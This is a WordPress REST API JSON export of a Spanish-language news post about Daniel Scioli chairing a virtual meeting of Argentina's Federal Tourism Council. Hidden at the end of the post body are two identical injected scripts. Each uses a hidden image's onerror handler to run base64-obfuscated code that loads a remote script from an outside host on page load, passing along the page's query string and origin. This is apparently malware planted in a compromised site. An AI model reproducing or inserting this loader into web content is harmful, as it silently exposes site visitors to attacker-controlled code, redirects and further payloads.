{"id":5021,"date":"2025-04-07T10:08:05","date_gmt":"2025-04-07T13:08:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5021"},"modified":"2025-08-13T23:37:14","modified_gmt":"2025-08-14T02:37:14","slug":"scioli-presidio-un-encuentro-para-potenciar-las-acciones-dentro-del-consejo-federal-de-turismo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5021","title":{"rendered":"Scioli presidi\u00f3 un encuentro para potenciar las acciones dentro del Consejo Federal de Turismo"},"content":{"rendered":"\n<p><strong><em>Es parte de la agenda de trabajo de las provincias que integran el organismo.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes,&nbsp;<strong>Daniel Scioli<\/strong>&nbsp;particip\u00f3 esta ma\u00f1ana de una reuni\u00f3n de autoridades del&nbsp;<strong>Consejo Federal de Turismo<\/strong>&nbsp;(CFT), acompa\u00f1ado por el presidente de la entidad,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>.<\/p>\n\n\n\n<p>El objetivo fue conversar y fortalecer la articulaci\u00f3n entre las provincias en temas y problem\u00e1ticas de inter\u00e9s com\u00fan, de cara a la pr\u00f3xima asamblea del CFT. La agenda incluy\u00f3 el abordaje de cuestiones como la&nbsp;<strong>Feria Internacional de Turismo<\/strong>&nbsp;(FIT), a realizarse en la Ciudad de Buenos Aires entre el 27 y el 30 de septiembre; el financiamiento de las jurisdicciones para el CFT; los beneficios de la celebraci\u00f3n de fines de semana largos, el calendario educativo y el de las pr\u00f3ximas asambleas y actividades del CFT; entre otros.<\/p>\n\n\n\n<p>En el encuentro, efectuado de manera virtual, tambi\u00e9n participaron: Guido Romero, ministro de Turismo, Cultura y Deportes de San Juan; Marcela Aeberhard, secretaria de Turismo de Santa Fe; Evangelina Quar\u00edn, secretaria de Turismo de Catamarca; Soledad Mart\u00ednez, subsecretaria de Turismo de la provincia de Buenos Aires; Dante Querciali, presidente del Instituto Fueguino de Turismo; y Germ\u00e1n Bakker y Romina Sorrentino, director y coordinadora del CFT, respectivamente.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:311px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Es parte de la agenda de trabajo de las provincias que integran el organismo. El secretario de Turismo, Ambiente y Deportes,&nbsp;Daniel Scioli&nbsp;particip\u00f3 esta ma\u00f1ana de una reuni\u00f3n de autoridades del&nbsp;Consejo Federal de Turismo&nbsp;(CFT), acompa\u00f1ado por el presidente de la entidad,&nbsp;Valent\u00edn D\u00edaz Gilligan. El objetivo fue conversar y fortalecer la articulaci\u00f3n entre las provincias en temas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5022,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,21],"tags":[],"class_list":{"0":"post-5021","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5021"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5021"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5021\/revisions"}],"predecessor-version":[{"id":6531,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5021\/revisions\/6531"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5022"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5021"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5021"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5021"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}